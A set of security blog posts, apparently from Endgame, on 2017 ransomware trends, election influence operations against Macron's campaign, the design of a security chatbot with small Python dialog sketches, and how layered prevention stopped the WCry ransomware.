Ransomware targeted against Internet of Things (IoT) devices is another potential area of growth. Most electronic household appliances now have wireless network connectivity. Juicers, weight scales, fridges, and toilets are among the devices that now offer connectivity and, thus, have the potential to be compromised on your home network. While connectivity may seemingly provide valuable extended functionality, these devices further expand your network footprint and may be more vulnerable to exploitation than your laptops and mobile phones.

The Satis smart toilet released in Japan in 2013 was found to have an insecure default configuration that potentially allowed for remote access to attackers via a Bluetooth mobile app

So, are we all about to be subjected to a wave of ransomware that prevents you from flushing your toilet? Will ransomware disable your thermostat? Will ransomware burn your toast?

The most likely answer to all of these is... possibly. Ransomware has become so prevalent primarily due to its simplicity: attackers just need their payloads to execute on as many hosts as possible. Since most IoT devices tend to run some flavor of Linux and custom software that is optimized for their specific use case, the expected financial gains currently do not appear to justify the work involved to successfully target these devices. These devices are also not easily reached through the channels ransomware attackers typically use to distribute their payloads: spear phishing and drive-by downloads. Additionally, these devices do not typically contain the same type of valuable user data that elicits ransom payments from victims. Nevertheless, these devices are not immune to compromise and tend to be less secure than PCs and mobile platforms due to default security configurations as well as the inconvenience of downloading and applying software security updates. The Mirai botnet in particular demonstrated how susceptible to attack IoT devices are across the world. Once an attacker successfully derives greater monetary value from deploying ransomware to IoT devices instead of utilizing them as part of a botnet, other copycat attacks could subsequently follow. It is almost certain that these devices will continue to be compromised and added to even larger botnets and subsequently leveraged in further distributed denial of service (DDoS) attacks.

Motivations

While monetary compensation is the overwhelming driver for ransomware attacks, the RanRan ransomware family that appears to be perpetrated by political dissidents in the Middle East points to attackers with differing motivations becoming more involved in the creation and use of ransomware. Dissidents and hacktivists looking to spread a message could find an audience through ransomware attacks, especially if they are successful and reported in the media.

Though disk wiping malware is typically associated with efforts to sabotage an organization, there have been recent reports of families of this type of malware now being modified to behave like ransomware by encrypting files and soliciting ransom payments from their victims. This combination of financial and destructive objectives puts the attackers in a unique position: they’re passing on the opportunity to outright destroy the data of their purported enemies in favor of making the data temporarily inaccessible in the hopes of procuring a ransom. As is the case with all ransomware attacks, there’s no guarantee that the perpetrators would make good on their promise in the event a ransom payment is actually made.

Technical Advances and Lower Barrier of Entry

Through our research, we have identified six key trends pertaining to ransomware that helped lead to both advances in capabilities by more skilled and experienced developers as well as the proliferation of ransomware through enabling less sophisticated attackers to become involved in its creation and distribution.

Exploit Kits Dropping Ransomware Payloads

Exploit kits have been around for over a decade, but the attackers leveraging them have started to alter their tactics due to the potential for easy and quick profits. Whereas before the ultimate goal for attackers leveraging an exploit kit would likely be to install botnet software and/or remote access tools (RATs) for spying on users and collecting credentials/personally identifiable information (PII), ransomware is being served up as the intended payload for these kits with increasing frequency. For example, in February 2016, the web site of a hospital in Ontario was hacked and subsequently modified to infect users with a variant of TeslaCrypt via the Angler exploit kit.

As new exploit kits continue to pop up and split off from or replace older kits, attackers will likely continue to use ransomware variants as part of their payloads to maintain a steady revenue stream due to their relative lack of sophistication. If attackers must choose between deploying ransomware and collecting/monetizing credentials and PII, they will likely continue to prefer the more straightforward and quicker attack scenario of ransomware versus the more conservative long con.

Ransomware Kits and Ransomware as a Service

The success of exploit kits and malware as a service has led to equivalent ransomware-based offerings sprouting up. Ransomware kits and ransomware as a service offerings provide an even lower barrier of entry for prospective criminal attackers that want to get started in producing and distributing their own ransomware variants. A subset of users of Microsoft Office 365 were infected in June 2016 with a variant of Cerber, a well-known ransomware as a service offering. The developers behind these offerings have gone to great lengths in marketing to potential customers on YouTube, and even openly host their own sites.


Official web site of The Rainmaker Labs, developers of Philadelphia and Stampado ransomware

The division of labor between the developers of kits and service offerings and ransomware attackers provides a mutually beneficial arrangement: developers continue to churn out more advanced ransomware while attackers focus on targeting new victims without needing to worry about the inner workings of the ransomware they are distributing. Both parties are also able to maintain their own steady revenue streams: sales of the ransomware keep the developers happy while the attackers collect cryptocurrency ransoms from their victims.


Philadelphia is a notorious Ransomware as a Service offering that has been known to target the healthcare industry, among others

As less sophisticated and technical attackers continue to become involved in the distribution of ransomware, kits and service offerings will likely continue to evolve to meet their needs and enable them to target victims and collect ransoms even more quickly.

Open Source/Educational Ransomware

Like other areas within the computer security industry, ransomware has seen its fair share of proof of concept/open source projects that have been published for the public, including EDA2 and ShinoLocker.

Though these efforts are meant to further research in the field and provide insight into how ransomware works under the hood, attackers have leveraged these projects to produce their own variants. For these attackers, they already have a fully functional codebase, so only minor changes are required to get their own variants up and running. In March 2016, a variant of the EDA2 open source ransomware project infected users via a link posted on a YouTube video. The availability of these projects in open source channels also provides additional camouflage in terms of attribution.

ShinoLocker Educational Ransomware Demo Video

As security researchers work to devise more advanced methods for detecting and preventing ransomware, more open source ransomware projects will spring up to provide platforms for generating samples for testing and educational purposes. Ransomware attackers will continue to leverage these open source and educational platforms for their own destructive goals for the foreseeable future.

Offline Ransomware

Ransomware variants that do not require an Internet connection to be fully functional are fairly prevalent. These variants do not require any command and control infrastructure, thus lowering the attacker’s footprint on the Internet and within their victims' networks. Also, since offline ransomware does not require any network functionality, its binaries/codebase can be further condensed and potentially appear less malicious to antivirus and endpoint protection detection mechanisms. A variant of the Dharma offline ransomware family was used to attack a horse racing web site based in India in January 2017.

Below are examples of offline ransomware families that the Endgame TRAP unit has observed throughout extensive testing:

Cancer
Chimera
CryptConsole
CryptoLocker
CryptoMix
CryptoShield
Crysis
Dharma
DirtyDecrypt
DMALocker
FakeGlobe
Fantom
FireCrypt
Globe
GlobeImposter
Gpcode
Jigsaw
Kangaroo
Koovola
PowerWare
RansomPlus
Rokku
Sage
Simple Encoder
Spora
TeslaCrypt
Unlock92
Xlocker
Xorist
Zyka

Though standing up ephemeral network infrastructure is easier than it has ever been thanks to an expanding range of cloud-based offerings, offline ransomware will likely continue to increase in prevalence due to the lack of a need for command and control endpoints.

Fileless Attacks

As malware authors devise new and innovative means for circumventing endpoint protection mechanisms, "fileless" malware has seen an uptick in usage due to its ephemeral nature and ease in both development and deployment. It should come as no surprise, then, that fileless ransomware has gained traction recently. PowerWare and RAA are among the more notable examples of fileless ransomware that have appeared since 2016. In March 2016, an unnamed healthcare organization was the target of an unsuccessful spearphishing campaign that employed PowerWare. These ransomware variants are just as capable as those developed in lower level programming languages and distributed as executables, but they are more easily customizable and portable thanks to their scripting language frameworks.

PowerShell, VBA, JavaScript, and other native Windows scripting languages that play key roles (e.g. downloader, dropper, environment detection) in typical fileless attacks also frequently serve the same purpose in setting up both fileless and typical executable-based ransomware attacks. Until they are routinely detected and prevented by a majority of current AV and endpoint protection products, fileless attacks will continue to serve as key components of ransomware attacks.

Raw Disk Ransomware

Though it is not a new threat, ransomware that encrypts, replaces, or degrades individual disk drive sectors (rather than or in addition to individual files) such as the Master Boot Record (MBR) or the Master File Table (MFT) did not see much use until 2016. Most ransomware variants target user documents (e.g. DOC, PDF, XLS) while avoiding system critical executable files (e.g. EXE, DLL, SYS) to keep the operating system stable and semi-operational. This allows victims to properly assess the damage and subsequently pay their ransom in order to retrieve their files.


Petya Bootloader Red Screen of Death

With ransomware variants that target disk drive sectors, such pleasantries are not possible. If the startup disk drive is successfully targeted by one of these variants, users will likely be unable to even properly access the operating system, as the ransomware will have replaced the startup routine contained within the MBR with its own custom bootloader. These bootloaders simply display a ransom note and prevent the user from proceeding further. A variant of the HDDCryptor raw disk ransomware family was used in the attack on the San Francisco Municipal Transportation Agency in late November 2016.


Petya Ransomware Ransom Note and Instructions

The following ransomware families that target raw disk drive sectors all were discovered in 2016:

HDDCryptor/Mamba (January 2016)
Petya (March 2016)
Satana (June 2016)

These types of ransomware variants are potentially much more catastrophic to end users than typical file-based encryption ransomware, since victims have fewer options for remediating the attack (e.g. volume shadow copies, network or external media-based file backups). Since the operating system has likely been overwritten and encrypted, users are left to assume that none of their files are recoverable. Depending on the success of these variants in soliciting ransom payments from their victims, ransomware attackers may develop advancements in an effort to further infect hard disk drives, the system BIOS, and other low level system components.

Conclusion

Unfortunately, ransomware does not appear to be going away anytime soon. As long as the risk to reward ratio remains in favor of ransomware, we are likely to see continued growth and creativity from its developers and attackers. In order to protect themselves from the effects of ransomware, users are highly encouraged to secure their hosts with a fully featured endpoint security product and maintain regular offline backups of their most important documents that may be susceptible to loss during ransomware attacks.

As for what to expect, there likely will be further developments in ransomware for macOS, Linux, mobile platforms, and possibly IoT devices. Exploit kits, ransomware kits, ransomware as a service offerings, and open source ransomware will continue to be leveraged by less sophisticated attackers and help them grow their budding criminal enterprises. Fileless ransomware will see more usage as attackers attempt to evade endpoint protection mechanisms. Offline ransomware will continue to be used by attackers wishing to minimize their footprint. And last, but certainly not least, expect to see more advanced ransomware that targets the MBR, MFT, and other raw disk drive sectors. In the coming weeks, I'll have a follow-on post to walk through how the Endgame research team is addressing these advances in ransomware. Stay tuned!


Cyber Attacks, Bots and Disinformation in the French Election

May 9, 2017, 7:28 am


At least as early as February, France’s intelligence agency warned that Russia aimed to influence the presidential elections in favor of Front National candidate Marine Le Pen. Throughout the spring, there were already indications of bots and false amplifiers spreading disinformation about Emmanuel Macron. Election watchers braced for some sort of data dump to dramatically influence the election. But it never came. Then, just 48 hours prior to the election, and just an hour before France’s media blackout, Macron’s campaign reported a 9GB breach, with Russia as the main suspect. While this cyber attack has garnered the most attention, it is important to highlight that data breaches are just one component of Russia’s multi-pronged information security strategy. Information operations comprise more than just a cyber attack, and equating the two has been detrimental to defenses and response strategies. A brief summary of the influence operations targeting Macron’s campaign in the lead up to the French elections, and the data dump this weekend, provides a useful case study as targeted cyber attacks and influence operations threaten to destabilize democracies across the globe.

Information Operations != A Hack

Influencing an election and hacking a campaign are related but distinct activities, and the difference matters because it affects how organizations prepare their defenses. Definitions could add great clarity, and are essential well beyond wonky semantic debates on the Hill. Facebook’s recent paper on information operations is a very useful starting point, and defines (page 5) information operations as, “Actions taken by governments or organized non-state actors to distort domestic or foreign political sentiment, most frequently to achieve a strategic and/or geopolitical outcome. These operations can use a combination of methods, such as false news, disinformation, or networks of fake accounts (false amplifiers) aimed at manipulating public opinion.” The only reference to hacking is account hacking, and the authors avoid semantic laziness by providing the concrete parameters of the various aspects of influence operations, additionally defining false news, false amplifiers, and disinformation. With its large role as a social media platform, Facebook is in a unique position to help provide clarity to a broader audience, which is desperately needed.

Facebook’s taxonomy is also fairly consistent with U.S. military doctrine, which views cyberspace as a domain within the information environment and treats cyberspace operations as just one of many information-related capabilities for achieving the desired objective. Cyberspace increasingly is the medium in which information operations occur. When it comes to cyber attacks, the National Institute of Standards and Technology defines a cyber attack as, “An attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.” These are useful distinctions when looking at the nuanced and varied objectives of adversaries.

Information operations are multi-faceted efforts to influence, and similarly attackers possess a range of objectives when conducting cyber attacks. At times they are mutually exclusive, such as when IP theft occurs for espionage (cyber attack, but not an information operation), or when bots spread disinformation (information operation without a cyber attack). Since the United States presidential election, there continues to be a constant flow of reports and articles decrying election hacking. Most of these reports conflate information operations and cyber attacks. There has yet to be evidence of tampering with any voting devices, but there were the infamous compromises of DNC and DCCC emails, which do constitute cyber attacks. Most also agree that Russia did attempt to influence the US presidential election, just as it had done previously elsewhere, as part of an information operations campaign.

Unfortunately, when discussing current events, these semantic nuances are lumped together for simplicity, and a broad range of information operations activities is mislabeled as a ‘hack’. This not only perpetuates theoretical underdevelopment within the community, but it hinders advancements in defenses and incident response planning. It also impacts policies, which in the United States at least, are often several decades old and could greatly benefit from modernization.

Modus Operandi for Information Operations

How do the various aspects of information operations work together and what role do cyber attacks play? The French election provides a useful heuristic to explore some of the key aspects of multi-faceted information operations campaigns, such as those linked to Russia.

Cyber Attacks

For months prior to the election, Macron had been accusing Russia of attempting to compromise his campaign, but never provided evidence. Understanding that his pro-EU stance made him a likely target of Russian information operations, Macron’s campaign took information security seriously and remained on high alert. In late April, a Trend Micro report described how a Russian group (which they dub Pawn Storm, aka APT 28, Fancy Bear, and several other aliases) created fake websites to harvest credentials. Macron’s digital chief confirmed the attempted intrusions, but also that they were thwarted. Just over a week later, and within hours of the election, Macron’s campaign confirmed a massive breach of internal communications. Targeted attacks such as this for data exfiltration, destruction, or a number of other objectives are only increasing.

Bots as False Amplifiers

For information operations, the computer attacks alone are generally not sufficient if they do not reach a broad audience. By one estimate, over this past weekend, 40% of #MacronGate tweets were produced by 5% of the accounts. #MacronLeaks reached 47,000 retweets in the first three hours following news of the hack. This amplification online helped move the meme from the United States to France, which, by law, was entering a moratorium on commentary on the French election. Even before the hack, Macron was targeted by social bots. The Digital Forensic Research Lab articulated how Russia was using bots as false amplifiers against the Macron campaign, greatly expanding the reach of the French-language version of Russian state-sponsored news outlets Sputnik and Russia Today. According to their analysis, this amplification is not an anomaly, but has persisted for at least six months.
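To make a figure like "40% of tweets from 5% of accounts" concrete, here is a small Python sketch of how such a concentration measure could be computed from a list of tweet authors. The function name and the data are invented for illustration; this is not the method behind the estimate cited above.

```python
from collections import Counter

def top_share(authors, top_percent=5):
    """Fraction of all tweets produced by the most active `top_percent` of accounts."""
    # Tweets per account, most active first
    counts = sorted(Counter(authors).values(), reverse=True)
    # Number of accounts in the top slice (at least one)
    k = max(1, len(counts) * top_percent // 100)
    return sum(counts[:k]) / len(authors)

# Synthetic data: 20 accounts, one of which (5%) posts 38 of the 95 tweets
authors = ["amplifier"] * 38 + [f"user{i}" for i in range(19) for _ in range(3)]
print(f"{top_share(authors):.0%} of tweets came from the top 5% of accounts")
```

A heavily skewed share like this is only a hint of automated amplification, not proof of it, since a handful of very active human accounts would produce the same number.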

False News & Disinformation

Disinformation campaigns are nothing new. However, thanks to bots, social media, and the apparent appeal of clickbait, false news and disinformation are reaching a broader audience and finding more success in today’s tech and social environment. For instance, Sputnik’s French-language version, under the auspices of fair reporting, repeatedly published biased reporting against Macron or in favor of Le Pen. RT and Sputnik ramped up negative coverage of Macron as the race drew closer, including unsupported allegations about his personal life and portrayals of him as an agent for the US banks. Finally, following the final presidential debate, Macron filed a lawsuit over the false information presented by Le Pen during the debate. She failed to provide any evidence, which demonstrates that as parties and their leadership repeat false information and treat it as a truism, it increasingly becomes accepted.

Preparing for Targeted Attacks

How organizations prepare for and respond to targeted attacks can greatly impact the extent of the damage. Understanding the attacker, and their objectives, is a first step as there are often lessons learned to help inform a baseline defense. For instance, the French broadcasting company, TV5Monde, was almost destroyed in 2015 by a digital attack. First attributed to ISIS, the highly targeted attack, which included wiper malware to destroy the company’s systems, has since been linked to a Russian group (the same APT 28). Moreover, lessons learned from Russian information operations during the U.S. elections also served as a guidepost as to how they combine cyber attacks, bots and false information. Organizations - especially political campaigns - must be aware that targeted attacks are eventually going to succeed, and must be prepared to remediate through both technical response as well as public relations (for the private sector) or policy (for the public sector) responses.

With that backdrop in mind, the French government and the Macron campaign both remained on heightened alert throughout the election. From suspending overseas electronic voting to Macron’s preemptive warnings that his campaign was under attack, the French public was well aware of the chances of a data breach, as well as wary of the intent of the attackers. The media also adhered to a blackout, limiting reporting of the data dump, which (to date) has been perceived as containing nothing out of the ordinary. As for the Macron campaign itself, they were well aware of the spearphishing approach and fake websites established to harvest credentials, and extremely confidential information was not sent via email. As the eleventh hour data dump illustrates, targeted attackers eventually find a way in, and thus remediation must also be in place. This may have even included planting false documents, about which more information is likely to emerge confirming or refuting this speculation.

For campaigns and governments, modernization of outdated policies is essential to tackle the range of cyber attacks and information operations. Following the compromise of emails, the French electoral commission noted that the dissemination of that information is liable to classification as a criminal offense, which also helped contain the information to less respected sources. Current President François Hollande also vowed a response to the attack, but has yet to clarify what that may entail. Macron similarly vowed retaliation, and his foreign policy advisor warned, “We will have a doctrine of retaliation when it comes to Russian cyberattacks or any other kind of attacks.” It will be important to keep an eye on how French policy evolves, and if there are lessons learned as Britain and Germany gear up for elections later this year.


Augmenting Analysts: To Bot or Not?

May 11, 2017, 7:31 am



Earlier this year, we announced Artemis, Endgame’s chat interface to facilitate and expedite complex analyses and detection and response within networks. Bots have been all the rage over the last few years, but had yet to make a splash in security. On the one hand, tech trends come and go and it is essential to refrain from jumping on the latest fad and avoid forcing the wrong solution onto a specific problem. At the same time, we could see the value in leveraging natural language processing in a conversational interface to reimagine search and discovery. And so we started on our journey into security bots. In this first of two posts, we’ll walk through our research problem and use case, the lessons learned as we dug deep into bot research, and the challenges with implementing a paradigm change in the way analysts and operators are accustomed to interacting with data. I mean we’re talking about a glorified chatbot, right? How hard can this be? Surely it wouldn’t require design discussions with engineering, product, data science, front end, UX, and technical writers...

Our Challenge

As data scientists working in security, we are well aware of the ever-growing data challenges, and the complaints of those analysts who are forced to find creative ways to circumvent the clunkiness of their current toolset. Their current workflow is manually intensive, and any automation requires scripting or programming knowledge. They needed a way to help automate some of the rote processes, while integrating analytics such as anomaly detection that take too long to be operationally impactful. Often, when analysts are provided tools that help in this area, the tools either don’t fit the workflow or require learning some kind of proprietary language. In some cases, the tools actually make life harder, not easier, for the analysts.

Even if the automation challenge is overcome, most security teams still lack the resources to keep pace with the growing challenges from the data and threat environments. This lack of resources crosses over into three distinct areas - time, money, and personnel. It is no secret that, on average, the time to discovery and detection of an attack lags significantly behind the time it takes for an attacker to achieve his or her objective. Consider the OPM breach, where the attackers had access to US personnel data for over a year before discovery. Unfortunately, most security teams lack the personnel and funding to shorten this gap.

Finally, while other tech industries have embraced and prioritized user experience for their broad and diverse user base, the security industry continues to make tools for itself. These tools generally require a level of expertise that exceeds what the talent pipeline can supply, which also deters many from entering the field.

It is against this backdrop that we started to explore a solution that addresses these three core challenges security teams encounter:

Insufficient resources
Lack of automated tools
Usability of security platforms


Why Build A Bot?

We explored different ways to augment our users’ ability to tackle these three challenges by focusing on enhancing their ability to discover and remediate alerts. This remains a core pain point, with alert fatigue and false positives impeding their workflow. We wanted a solution that provided analysts an interface to ask questions of their data, automate collection, and bring back only the relevant information from an endpoint. When exploring our solution, we had two primary users to consider: Tier 1 and Tier 3 analysts.


As the graphic above illustrates, even though these individuals work together as a part of a security team, their workflows could not be more different. But maybe, if done correctly, we could augment Tier 1 analysts while providing Tier 3s a non-obtrusive (and even helpful!) interface for their day-to-day. Our solution: An intelligent assistant or a chatbot.

A bot allowed us to build a service that leverages natural language processing to determine user intentions and help automate workflows. By mimicking conversation, we could provide users an interface that allowed them to be as expressive or as curt as they want as they inquire about everything from alerts to endpoint data.


Rule #1 in Bot Design: Manage Expectations

When we pitched the idea to our team we were wary of tossing around words like Artificial Intelligence. After all, we weren’t building JARVIS from Iron Man and at no point was Scarlett Johansson going to start talking to SOC analysts about the latest network threats. Moreover, we emphasized that this feature would not be the abrasive hell that was MS Clippy. Instead we kept it simple. We posited that a simple conversational interface could encourage users to dig deep into endpoint data by eliminating the need for query syntaxes or complex click-through user interfaces. It cannot be overstated that managing expectations was paramount to getting the project off the ground. Once we were given the go-ahead a bigger question arose… “How are we going to build this thing?”

Challenges with Open Source Bots

The rise of bots and intelligent assistants is largely due to an increase in Bot Development Kits or BDKs. Companies like Wit.ai (acquired by Facebook), API.ai (acquired by Google) and Chatfuel provide a simple UI for the development of closed-domain, rule-based, goal-oriented bots where no real programming skills are required to successfully launch a bot. In addition, Microsoft and Amazon have released their own dev kits to allow users to quickly get an app integrated into their platforms. These various kits are treasure troves of knowledge on how best to build a bot to suit your needs. We would have loved to use any single one of them, but we were trying to provide a bot within our EDR Platform to interact with complex endpoint data, using a diverse and industry-targeted vocabulary none of these frameworks currently supported.

For instance, large companies have generally focused on building general assistant bots and deploying them on third-party platforms like Slack or Facebook Messenger. Our assistant had to be structured to enable users in a SOC to perform their duties safely and efficiently on our platform, making it impossible to use a third-party bot kit service. The specificity of the security domain meant that we often weren’t simply translating buttons from a form into a bot. Instead the entities (an NLP term we’ll dive into in the next post) we extract are often semistructured at best, and the intents range from “find bad things” to “pull memory from this running process with PID 4231”.

After reviewing the current state-of-the-art it was clear we had our work cut out for us. Where and how do we acquire the dialog data necessary to build our bot? How can we account for and properly capture the diversity in vocabulary across the information security domain? How can we build a tool that helps train Tier 1 analysts while preventing Tier 3 analysts from being shackled by rigid, scripted routines? It was on us to figure out what makes a bot tick and then implement it ourselves.

Designing Artemis

The engine for Artemis needed to fulfill certain design goals. For starters, bot architectures can be rule-based or driven by machine learning, and the choice depends primarily on the amount of training data at your disposal. The goal is to produce a dialog tree similar to the one pictured below that is designed to complete a task. Each branch of the tree represents a question a user must answer to progress to the next node or state.


To move toward this functionality, the bot needs to handle missing values for a given intent. For example a user might like to search for a process by name or PID to find if a specific piece of unwanted software is running on multiple endpoints. The user might write “find processes with the name svchost.exe on all endpoints” or “search processes on all endpoints”. In the second example, the intent classifier can classify “search processes” as a ‘search_process’ intent and then note that the intent contains an ordered list of required and wanted values. When Artemis is faced with a known intent and a lack of needed values, it simply asks the user to enter the missing value. Simple, but it works.
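As a rough illustration of the missing-value handling described above, here is a minimal Python sketch. It is not Artemis's actual code: the intent schema, slot names, and prompt wording are all assumptions made up for the example.

```python
from dataclasses import dataclass, field

# Hypothetical intent schema: each intent lists its required values in the
# order the bot should ask for them. Names are illustrative only.
REQUIRED_SLOTS = {
    "search_process": ["process_name", "endpoints"],
}

@dataclass
class DialogState:
    intent: str
    slots: dict = field(default_factory=dict)

    def missing(self):
        """Return the required slots that have not been filled, in order."""
        return [s for s in REQUIRED_SLOTS[self.intent] if s not in self.slots]

def next_prompt(state):
    """Ask for the first missing slot, or return None when the intent can run."""
    missing = state.missing()
    if missing:
        return f"Please provide a value for '{missing[0]}'."
    return None

# "search processes on all endpoints": intent known, process name missing
state = DialogState("search_process", {"endpoints": "all"})
print(next_prompt(state))
state.slots["process_name"] = "svchost.exe"
print(next_prompt(state))
```

Keeping the required values as an ordered list means the same loop serves every intent, so supporting a new intent only requires adding an entry to the schema.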

In addition to handling missing entities, some intents require multiple values in a single user input, such as username, process and endpoint. Some values a user enters can be recognized by a pattern-matching grammar, but some value types are hard to tell apart from one another. The best we can hope for here is disambiguation. So within a certain context “Admin” is likely a user name, but it may also be a file name. In this case, Artemis will propose one based on context and offer the opportunity to change its interpretation to file name.
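The disambiguation step can be sketched in Python along the following lines. The regular expressions, entity type names, and the context hint are hypothetical stand-ins, and a production grammar would need to be far richer than this.

```python
import re

# Illustrative patterns only: values with a recognizable shape are typed directly.
PATTERNS = [
    ("pid", re.compile(r"^\d{1,7}$")),
    ("file_name", re.compile(r"^[\w.-]+\.(exe|dll|sys|ps1)$", re.IGNORECASE)),
]

# Types that cannot be told apart by shape alone (e.g. "Admin")
AMBIGUOUS_TYPES = ["user_name", "file_name"]

def interpret(token, context_hint=None):
    """Return (best_guess, alternatives) for a single user-supplied value."""
    for entity_type, pattern in PATTERNS:
        if pattern.match(token):
            return entity_type, []
    # No pattern matched: rank the candidates, putting the context hint first
    ranked = sorted(AMBIGUOUS_TYPES, key=lambda t: t != context_hint)
    return ranked[0], ranked[1:]

print(interpret("4231"))                 # shape alone identifies a PID
print(interpret("Admin", "user_name"))   # ambiguous: guess plus an alternative
```

Returning the alternatives alongside the guess is what lets the bot offer the user a one-step correction instead of silently committing to its first interpretation.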

Another finer point of implementing dialog systems, explored in detail in this Microsoft Research paper, is implicit confirmation. Once the user has entered the query string of the search, they shouldn’t be forced to tell Artemis to continue to the endpoint selection. Instead, Artemis must implicitly confirm the query string choice and move the user towards the endpoint selection and execution of the operation. Although this may seem obvious, early draft designs of Artemis left the user in limbo. After entering one entity, the bot would reply that it “got it” but then wouldn’t move to the next.
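One way to picture implicit confirmation is a reply function that echoes the value it just received and asks for the next one in the same turn. The Python sketch below assumes a two-step search workflow; the step names and reply wording are invented for the example and are not taken from Artemis.

```python
STEPS = ["query", "endpoints"]  # hypothetical step order for a search workflow

def reply(collected, step, value):
    """Record the value, then confirm it implicitly while advancing the dialog."""
    collected[step] = value
    remaining = [s for s in STEPS if s not in collected]
    if remaining:
        # The confirmation is folded into the next question, so the user is
        # never left waiting after a bare "got it"
        return f"Got {step} '{value}'. Next, which {remaining[0]} should I use?"
    return f"Running search for '{collected['query']}' on {collected['endpoints']}."

collected = {}
print(reply(collected, "query", "svchost.exe"))
print(reply(collected, "endpoints", "all"))
```

If the echoed value is wrong, the user can correct it in their next message, which costs one turn only in the failure case rather than an explicit confirmation on every step.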

This is why our development occurred so closely with both practitioners and our user experience team: to ensure we account for as many of these ‘gotchas’ as possible. We took the wide range of subject matter expertise at Endgame, including incident responders, hunters, designers, and malware analysts, and built custom workflows and recommendations on what to do next during an investigation.

Next Steps

Having explored the state-of-the-art in bots, properly scoped our requirements, and integrated subject matter and design expertise, we were ready to finally throw some data science at it and make Artemis a reality. But before we could provide anything useful, we first had to teach Artemis to understand what the end user typed in the window. No. Easy. Task. In our next post, we’ll get into the technical details of our natural language processing (NLP) approach, including the basic tenets of NLP that are relevant to bots and the need to coordinate with user experience designers to truly address our users’ key pain points. Combining user-centric design with our natural language understanding pipeline proved to be the essential factor in delivering cutting edge data science capabilities within our user-friendly platform.

↧

Don't (W)Cry, You've Got Endgame

May 12, 2017, 3:22 pm


Three of the most prominent attack trends in cybersecurity converged today: ransomware attacks, data dumps of nation-state offensive capabilities, and an emergence of the healthcare industry as a leading victim of cyber attacks. The confluence of these trends resulted in a wide-scale ransomware attack that to date has already hit over 70,000 computers in 74 countries. These numbers are likely to grow. Most notably, sixteen hospitals in the United Kingdom were locked down today, disrupting or cancelling the majority of services. The ransomware also impacted several large companies in Spain, including Telefonica, but did not disrupt customer service as it was limited to their internal network.

The attack deployed an exploit called Eternal Blue, which targets a known Windows vulnerability that Microsoft patched in March 2017 with MS17-010. The exploit was recently released in a Shadow Brokers data dump. While it is not yet known who is behind this ransomware attack, it is indicative of the increasing (usually inadvertent) ‘tech transfer’ of nation-state capabilities to other groups. Given the ongoing impact of this ransomware attack, we immediately tested our platform against it. Let’s walk through some details of the ransomware, our layered prevention approach, and how 2017 already seems to be overshadowing 2016 with the continued sophistication and reach of ransomware.

Layered Prevention

The WCry ransomware (also known by several other names, including WanaCryptor and WannaCry) responsible for today’s widespread attack provides a harsh lesson in properly securing systems. The exposure of so many systems to the MS17-010 vulnerability has enabled this ransomware to propagate rapidly. Patches should have been applied when they were released, and especially once it became clear that the patch mitigated the Shadow Brokers exploit. Organizations that haven’t patched should be urgently scrambling to patch now. As this ransomware attack demonstrates, IT organizations often fail to promptly patch their systems. This occurs for numerous reasons, including concerns over disruption to business processes and difficulty maintaining an accurate inventory of assets. Because of this, defenses must be in place which can reliably and consistently block a wide range of attacks, including those which can take advantage of a new vulnerability and spread rapidly such as this one.

The WCry ransomware demonstrates the necessity of layered prevention to protect enterprises from ransomware and other forms of targeted attacks. Organizations need effective defenses against exploitation, malware and fileless attacks, and malicious behaviors all operating in parallel. In addition, these layers must be effective in detecting never-before-seen attacks. As we’ve seen time and time again, signature-based defenses can’t compete against motivated and sophisticated attackers. This reality forms the foundation of Endgame’s zero-breach tolerance approach to defending customer networks.

Preventing the Attack

Traditional signature-based AVs are generally ineffective against novel, emergent attacks such as this one. Financially-motivated attackers know this and operate accordingly. The WCry dropper file (24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c) was not broadly detected by antivirus programs the morning of May 12 when the outbreak began to spread. This surely played a role in its “success” from the view of the adversary.

However, Endgame’s MalwareScore™, and its machine-learning based approach to detection, can stop this attack in its tracks. With MalwareScore™, prevention is in place with no prior knowledge of the WCry malware itself, protecting customers at the outset of the attack. Always wary of exaggerated claims about how AI and machine learning can solve every security problem in the industry, we know machine-learning itself is not a silver bullet. But when applied correctly, it is a powerful tool for the defender to battle widespread attacks such as today’s ransomware attack.

Why does machine learning do better in detecting new, never-before-seen malware? Machine learning is better at generalizing at scale than humans. Computers are very good at finding small distinguishing patterns across millions of malware samples and then recognizing those patterns in unknown samples. These patterns are analogous to human-derived signatures, except that they apply to far more samples than a signature for a particular sample, allowing a classifier to better predict new malware. As the image below demonstrates, MalwareScore™ successfully detected WCry. Endgame’s core engine is available in VirusTotal if you want to test it out for yourself.


Malware Prevention End User Popup Notification for the WCry dropper

However, no malware detection capability is perfect. If anyone tells you they will detect all current and future malware through machine learning alone, they are lying. This is why layered preventions are important. So what if this particular dropper or follow-on files don’t get stopped by your malware defenses?

If allowed to run, the dropper will write multiple files to disk and execute the ransomware encryptor functionality under two separate contexts: one as a child process to a command shell running under services.exe and another as a child process of the dropper under Windows Explorer.


WCry Dropper Process Tree


WCry Service Process Tree

On systems where malware prevention is not enabled, or if a variant emerged which is in the 1% of malware not detected by MalwareScore™, Endgame’s ransomware protection feature is in place to stop ransomware attacks. This feature, which we will describe in detail in an upcoming post, monitors dozens of aspects of all system processes in real-time. Very shortly after ransomware activity kicks off, threads associated with the ransomware activity are suspended, protecting critical data on customer machines.

We tested this on a machine protected by Endgame with MalwareScore™ prevention turned off. As expected, our ransomware prevention feature detects the malicious activity immediately after it begins. Critical data on these systems is protected.


Ransomware Protection End User Popup Notification for WCry

Conclusion

Over the following days and weeks, we are likely to better grasp the extent and impact of WCry, which has spread outside of Europe and into Asia as of this writing. These kinds of targeted and widespread attacks can be very lucrative, and until that changes, they are likely to become more common as well. Layered behavioral preventions are necessary to stop these ransomware attacks, and modern attacks in general which are increasingly targeted. They are especially necessary to stop the sort of attack we see unfold today within the UK NHS and elsewhere. This particular attack has been enabled by an unfortunate proliferation of suspected nation-state level capabilities combined with poor patching practices. As this worm propagation continues, keep in mind that the payload of this attack is preventable with the right defenses.

↧

WCry/WanaCry Ransomware Technical Analysis

May 14, 2017, 6:36 pm


